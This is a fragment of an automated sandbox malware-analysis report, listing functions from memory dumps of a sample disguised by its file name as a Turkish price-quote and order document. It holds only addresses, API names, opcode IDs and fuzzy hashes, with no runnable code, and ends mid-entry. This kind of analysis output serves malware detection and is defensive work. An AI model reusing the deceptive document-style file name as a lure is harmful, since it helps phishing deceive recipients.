                                                                                        • Snapshot File: hcaresult_5_2_6c40000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID: DispatchMessage
                                                                                        • String ID:
                                                                                        • API String ID: 2061451462-0
                                                                                        • Opcode ID: f752943e1e6061aa41059a76b093b2c47734a68568e80c3bd90298a843228205
                                                                                        • Instruction ID: 4f721406bf99fc808f3c4fb2784d8f28107d2a19206cce0d2032dabb5af064fd
                                                                                        • Opcode Fuzzy Hash: f752943e1e6061aa41059a76b093b2c47734a68568e80c3bd90298a843228205
                                                                                        • Instruction Fuzzy Hash: 3B11F2B5C047498FCB24DF9AD444BDEFBF4EB48320F10846AD419A7250D378A944CFA5
                                                                                        Function 06C49B78 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OleInitialize.OLE32(00000000), ref: 06C4AA05
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3720215962.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6c40000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 2538663250-0
                                                                                        • Opcode ID: ebee77e51c57b0d8edea72308fc2e538771ef30b21a8e906e45063310d58b3b8
                                                                                        • Instruction ID: fca875ffed36eadc818cdcd8b1cfc5ed2fbf85ec887d02d9b2a05fb1d8b25a02
                                                                                        • Opcode Fuzzy Hash: ebee77e51c57b0d8edea72308fc2e538771ef30b21a8e906e45063310d58b3b8
                                                                                        • Instruction Fuzzy Hash: 6C1145B5C043488FDB20DF9AC444B9EBBF4EB48324F10841AD518A7200C379A944CFA4
                                                                                        Function 06C4A9A8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OleInitialize.OLE32(00000000), ref: 06C4AA05
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3720215962.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6c40000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 2538663250-0
                                                                                        • Opcode ID: b76657fec46a4f5c8779c3f9162f156802e90f26934c151cff25ccc72a41906a
                                                                                        • Instruction ID: 01e70833e10a53593cd17ffde382323e9a6bc5609ca48a123699e9a1a2acbed9
                                                                                        • Opcode Fuzzy Hash: b76657fec46a4f5c8779c3f9162f156802e90f26934c151cff25ccc72a41906a
                                                                                        • Instruction Fuzzy Hash: B41115B5C003498FCB20DF9AD585BDEBBF4EB48324F108419D558A7340C779A945CFA5
                                                                                        Function 06C4BD1A Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06C4B2F7), ref: 06C4BD7D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3720215962.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6c40000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID: DispatchMessage
                                                                                        • String ID:
                                                                                        • API String ID: 2061451462-0
                                                                                        • Opcode ID: c4a92fc58277596193e9b52eb7b4a6518e96de0363b2ea2ef5238ecc4b4dae9e
                                                                                        • Instruction ID: 6953dc25ea5287883249a247a0121d936cee2cbf73ae01385660335113ffeb1c
                                                                                        • Opcode Fuzzy Hash: c4a92fc58277596193e9b52eb7b4a6518e96de0363b2ea2ef5238ecc4b4dae9e
                                                                                        • Instruction Fuzzy Hash: DB1100B5C007498FCB20DF9AD844BDEFBF4EB48320F10842AE818A7250D378A944CFA5
                                                                                        Function 012FE007 Relevance: .7, Instructions: 654COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b70c51ec3363183ad1bfd134a2b32e9a3fde6c90abb6cd3a5490bf9b7fd9ce99
                                                                                        • Instruction ID: 53610a4d0793b8c3fa71f64f077ac147a700295a7e4b10f4d6e3f2c9d3e2b201
                                                                                        • Opcode Fuzzy Hash: b70c51ec3363183ad1bfd134a2b32e9a3fde6c90abb6cd3a5490bf9b7fd9ce99
                                                                                        • Instruction Fuzzy Hash: E712A935025253CFE2662B74E6AC16ABF6DFF4F323B45AD20E81F8104DEB7644498B21
                                                                                        Function 012FE018 Relevance: .6, Instructions: 647COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a02119553c45de31cf6d4bb7b92109460e5f6c6b117611ec48811ec2a6d3a09e
                                                                                        • Instruction ID: 34fd15646a07f2ac985fc717216a5288c5b3917b781e15b6de8096a90d141663
                                                                                        • Opcode Fuzzy Hash: a02119553c45de31cf6d4bb7b92109460e5f6c6b117611ec48811ec2a6d3a09e
                                                                                        • Instruction Fuzzy Hash: 6A129835061253CFE2666B64F6AC16ABE6DFF0F323B45AD20F91F8104DEB7644498B21
                                                                                        Function 012F80D8 Relevance: .2, Instructions: 201COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8ba40bf23f6e4ea4da76f81711f206335f25176ee50e6d215e217684eae97e5d
                                                                                        • Instruction ID: 12d8ade84bdbd28f0d35991559d5c6d0589ad2e98c95054fa0106b02a988678c
                                                                                        • Opcode Fuzzy Hash: 8ba40bf23f6e4ea4da76f81711f206335f25176ee50e6d215e217684eae97e5d
                                                                                        • Instruction Fuzzy Hash: 0F7127397206468FDB25DF6CC894A6AFBE5AF49701F1500A9EA06DB371DB70EC41CB50
                                                                                        Function 012FF738 Relevance: .2, Instructions: 150COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ba97a0dbde47933a260adfd2ce75f73c44e9837a857b0ba5f66236b00b5b08d3
                                                                                        • Instruction ID: 44ac5f4dc1cfc8e488a15056d1a9c0ae8c7ba55f2e960d24b228d738b1fc0094
                                                                                        • Opcode Fuzzy Hash: ba97a0dbde47933a260adfd2ce75f73c44e9837a857b0ba5f66236b00b5b08d3
                                                                                        • Instruction Fuzzy Hash: B361DE74D00318DFDB15DFA5D954BAEBBB2BF88300F608129D809AB299DB756A45CF40
                                                                                        Function 012FD548 Relevance: .1, Instructions: 140COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 83f878e39ba2ec1e7d77057ec371e6050460c8871bbe2281a210713a9efc9a88
                                                                                        • Instruction ID: c58f2c9bd980a6e4af0cfef0c58e75a4df7d489f311619b73a7340f7811e1dc4
                                                                                        • Opcode Fuzzy Hash: 83f878e39ba2ec1e7d77057ec371e6050460c8871bbe2281a210713a9efc9a88
                                                                                        • Instruction Fuzzy Hash: E9519474E11208DFDB44DFA9D59499DBBF2BF89300F24816AE805AB364DB31A805CF40
                                                                                        Function 012F41A0 Relevance: .1, Instructions: 134COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 561878b299777a1af165218d249ca59ab4baa25b81b4c93c9be9e93256896b47
                                                                                        • Instruction ID: 523f1acb514c65945218162041b10adbbbe4128f66d1699de1e9509545fd8a82
                                                                                        • Opcode Fuzzy Hash: 561878b299777a1af165218d249ca59ab4baa25b81b4c93c9be9e93256896b47
                                                                                        • Instruction Fuzzy Hash: 9F519375E01218CFCB08EFAAD58499DBBF6FF89300B209569E905AB324DB31AC41CF50
                                                                                        Function 012FA303 Relevance: .1, Instructions: 125COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 760a22d179278356e0398d131c51b9fb47baac2bdf8de7bc16861ebc875c2692
                                                                                        • Instruction ID: fade59c7aa7be082ca3e88a91ba5666a455669fb63dfde8c7953abf18df66f9c
                                                                                        • Opcode Fuzzy Hash: 760a22d179278356e0398d131c51b9fb47baac2bdf8de7bc16861ebc875c2692
                                                                                        • Instruction Fuzzy Hash: 5C51B131A14249DFDF16CFA8C844A9DFFB2FF89310F048469EA499B266D374E915CB60
                                                                                        Function 012F5658 Relevance: .1, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3693a3d927edb8ac2d6a3d721559b25f4165b5e13eb9e92cf69e23d846d7c44a
                                                                                        • Instruction ID: 716ce06c1f66c4f8fc1067491960d58ac55bfc2925cbee703d7b7e452c2c004a
                                                                                        • Opcode Fuzzy Hash: 3693a3d927edb8ac2d6a3d721559b25f4165b5e13eb9e92cf69e23d846d7c44a
                                                                                        • Instruction Fuzzy Hash: B631903571110ADFCF159F68D854ABFBBB6FB48305F004428FA158B258CB75C925CBA0
                                                                                        Function 012F8380 Relevance: .1, Instructions: 87COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b703c4a171f0ff30dfda86f97abccb59fd43105bf5e8ddc7b2e016b80fbafc4d
                                                                                        • Instruction ID: 51164240279f5c3943b13100e7ba971fb6dad1dc4290fb25f7805dfee80be7d9
                                                                                        • Opcode Fuzzy Hash: b703c4a171f0ff30dfda86f97abccb59fd43105bf5e8ddc7b2e016b80fbafc4d
                                                                                        • Instruction Fuzzy Hash: 1821F2313202014BEF26562D845473EE69BEFC4748F14803DDB06CB39ADE75CC429385
                                                                                        Function 012F62F0 Relevance: .1, Instructions: 77COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f47583e4723f11ed455155bcfb9ac465fda5d88d9f567e1d82ad3145303dbe51
                                                                                        • Instruction ID: eac95e9f42b5d734b44ce4fa717d16afa8b93a89903eafa2e6bc1db693da4c85
                                                                                        • Opcode Fuzzy Hash: f47583e4723f11ed455155bcfb9ac465fda5d88d9f567e1d82ad3145303dbe51
                                                                                        • Instruction Fuzzy Hash: FD21C2357156118FDB259B29D45492EFBA2FFC9B55B18857DEA06CB398CF30DC028B80
                                                                                        Function 012F28F0 Relevance: .1, Instructions: 77COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9300f5986d7b9e4fddacc9fa6cdf00e92dd9dd91ba1dc70222ce9c5ab3a4971e
                                                                                        • Instruction ID: eed740045a720a24b47ef2291774b4752689998f07c39d964f64ccb7ab56af61
                                                                                        • Opcode Fuzzy Hash: 9300f5986d7b9e4fddacc9fa6cdf00e92dd9dd91ba1dc70222ce9c5ab3a4971e
                                                                                        • Instruction Fuzzy Hash: E5219535A00215DFCB15DF28C440AAE7BA5EB9D360F61C52DDA099B348DB31EE42CBD1
                                                                                        Function 012AD044 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709683349.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12ad000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2614d856e614f3c610760ded8d8680196e3ee00b5b753b76fa8131dc7f7e58a2
                                                                                        • Instruction ID: 3ba779b071456c198e6f0b2a81a7f79f7cb0c14409eaa0faf928a175ee842bf5
                                                                                        • Opcode Fuzzy Hash: 2614d856e614f3c610760ded8d8680196e3ee00b5b753b76fa8131dc7f7e58a2
                                                                                        • Instruction Fuzzy Hash: 86214271654308DFDB10CF64C8C4B22BB61FB88314F60C9ADE9490B642C77AD84BCA62
                                                                                        Function 012F5649 Relevance: .1, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 124e036f1dfd211e68938a5b70232bf69ad0295c56b7b9a0e14f1cc5019471dd
                                                                                        • Instruction ID: bd4c88f0d8656cfdec440b5579fc16c8c0fcacce4d79f52c686ccce9d34b2f29
                                                                                        • Opcode Fuzzy Hash: 124e036f1dfd211e68938a5b70232bf69ad0295c56b7b9a0e14f1cc5019471dd
                                                                                        • Instruction Fuzzy Hash: AE21313170520A8FCF099F28E404A7FBBB1FB48310F004069FA158B248CB348D15CB90
                                                                                        Function 012F4285 Relevance: .1, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8338eaf8427e7d05ee8c1b6e5a699f881708a2585b1f41788a49c3a128868311
                                                                                        • Instruction ID: 4586be77dd6d8282501d6693d1ec4169a143e8d05450198e5d12cd9094c383e7
                                                                                        • Opcode Fuzzy Hash: 8338eaf8427e7d05ee8c1b6e5a699f881708a2585b1f41788a49c3a128868311
                                                                                        • Instruction Fuzzy Hash: 9E31A378E11358CFCB09EFA9E58499DBBB6FF49301B205569E909AB324DB31AC01CF00
                                                                                        Function 012F9761 Relevance: .1, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fbeae925aef4a81e95d6ce17b50258f9f5fde84d43cf4d12bb242c4505d494b9
                                                                                        • Instruction ID: 627c1772e51697a3f10aae397d9256928c0d1806c189ceeb840dcb35e07f876a
                                                                                        • Opcode Fuzzy Hash: fbeae925aef4a81e95d6ce17b50258f9f5fde84d43cf4d12bb242c4505d494b9
                                                                                        • Instruction Fuzzy Hash: 38218D70E01249DFDF19CFA5D550AEEBFBAAF49308F148069F600A6294DB30D981CF20
                                                                                        Function 012F6300 Relevance: .1, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 70aec1ca043b0eb0fee187a170d17506d0e5c451e9ed39eeef7a57b1162c3b75
                                                                                        • Instruction ID: 2d79eb554c2e40b33a6ca9cd5fe415377bc0e762ce2c958d4ff77f77c4d721a3
                                                                                        • Opcode Fuzzy Hash: 70aec1ca043b0eb0fee187a170d17506d0e5c451e9ed39eeef7a57b1162c3b75
                                                                                        • Instruction Fuzzy Hash: E311C2353116129FD7255B2EC45492EFBA6FFC5B51B08407CEA06CB358CF21DC028790
                                                                                        Function 012FF658 Relevance: .1, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 831a44c48ef92ef464ed4011cd57df6663755e5eba4b7d2a148c6937613d1567
                                                                                        • Instruction ID: ff6e3d1e53d6e06fc0d6f57fa066b2e54007499e361379fe62f00acf5dda2aa4
                                                                                        • Opcode Fuzzy Hash: 831a44c48ef92ef464ed4011cd57df6663755e5eba4b7d2a148c6937613d1567
                                                                                        • Instruction Fuzzy Hash: 57217974D0020A9FDB04EFB9D94069EBFB2FF45300F1482AAD1149B268EB705E0ACF81
                                                                                        Function 012FF668 Relevance: .1, Instructions: 54COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bf6f616c43be461e80332a73f5d08ff835e4c94c544d52d33d1527ab24d65eb7
                                                                                        • Instruction ID: 791d58305afdb41629e8e5d3fb15c79bf8ce50ddaa2a9ed8fdab7159c92acf47
                                                                                        • Opcode Fuzzy Hash: bf6f616c43be461e80332a73f5d08ff835e4c94c544d52d33d1527ab24d65eb7
                                                                                        • Instruction Fuzzy Hash: 0C11F974D0021A9FEB54EFB9D540A9EBFF2FB44304F5486A9D1189B258EB706A09CF81
                                                                                        Function 012AD03F Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709683349.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12ad000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                        • Instruction ID: 9e5a98e585df85a9964b44442f37acc6ded2f2d43a7cf2f7ac259f74e5eb0b35
                                                                                        • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                        • Instruction Fuzzy Hash: A311D075544244CFCB16CF54C5C4B15BF62FB44314F24C6AEE9494B652C33AD44ACF51
                                                                                        Function 012F27FB Relevance: .1, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d914baeff75fbb1c92db9390a493f367f8e43acd5719bc345467cbadd4d4008a
                                                                                        • Instruction ID: ac640a9792b6bb3fa2acf9431a5e3076a03cdcee74dc6a396412ad53f23fe157
                                                                                        • Opcode Fuzzy Hash: d914baeff75fbb1c92db9390a493f367f8e43acd5719bc345467cbadd4d4008a
                                                                                        • Instruction Fuzzy Hash: E711B2B4D0020ACFCF00EFA9D9596EEBBF9FF09304F10516AD905B6214EB305A95CBA1
                                                                                        Function 012F5E98 Relevance: .1, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f3e33bdfa789d3f5b27ff2d519ffb257235467b87f9aa3e816d945f025429ed8
                                                                                        • Instruction ID: cd1ffdd93492a054f357212c558271be76fca3c93e914a40bbbd5d426815140b
                                                                                        • Opcode Fuzzy Hash: f3e33bdfa789d3f5b27ff2d519ffb257235467b87f9aa3e816d945f025429ed8
                                                                                        • Instruction Fuzzy Hash: 5301F532710155AFCB268E6998106FE7FB6EBC9240F18802AF605C7248CA718C1697A0
                                                                                        Function 012FE8E8 Relevance: .0, Instructions: 48COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2e053afbbc4ac429d52a7099ae0c9416276e07c7f57326c8eb47d63cead61e72
                                                                                        • Instruction ID: 47ce6d4522161a5de313b7c3feac8baec87b917ae5fd2de14de1f6f3cb2904e9
                                                                                        • Opcode Fuzzy Hash: 2e053afbbc4ac429d52a7099ae0c9416276e07c7f57326c8eb47d63cead61e72
                                                                                        • Instruction Fuzzy Hash: 2B116D74E0020AEFCF01DFB8D8559EEBBB1EB49300F104566DA20A7355D7345956CB90
                                                                                        Function 012FABE0 Relevance: .0, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1189937dd07df60eec4d73e7e15c04e97523588a2870651ed44935b96824d91d
                                                                                        • Instruction ID: 5262baea307559ae2c75ef2e5f1b8401c4938f83993dd0684b13795b197e07d8
                                                                                        • Opcode Fuzzy Hash: 1189937dd07df60eec4d73e7e15c04e97523588a2870651ed44935b96824d91d
                                                                                        • Instruction Fuzzy Hash: 85F0F6313202154B97265A2ED454B2EFAEEEFC8B51B09407DEB0DC7365EE21CC028380
                                                                                        Function 0129D01F Relevance: .0, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709627597.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_129d000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d8682057e91d213f194cb03b34859559c68ae862a9851ba05bca3e9c1d19bc6f
                                                                                        • Instruction ID: 360240236aff8509176e51869be86b5625346c747bc6e4463a007f135af644aa
